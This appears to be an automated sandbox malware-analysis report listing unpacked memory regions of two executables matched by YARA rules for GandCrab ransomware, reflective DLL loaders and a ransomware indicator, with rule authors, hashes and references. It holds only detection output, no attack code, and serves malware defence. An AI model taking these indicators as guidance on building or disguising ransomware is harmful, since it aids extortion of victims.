Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
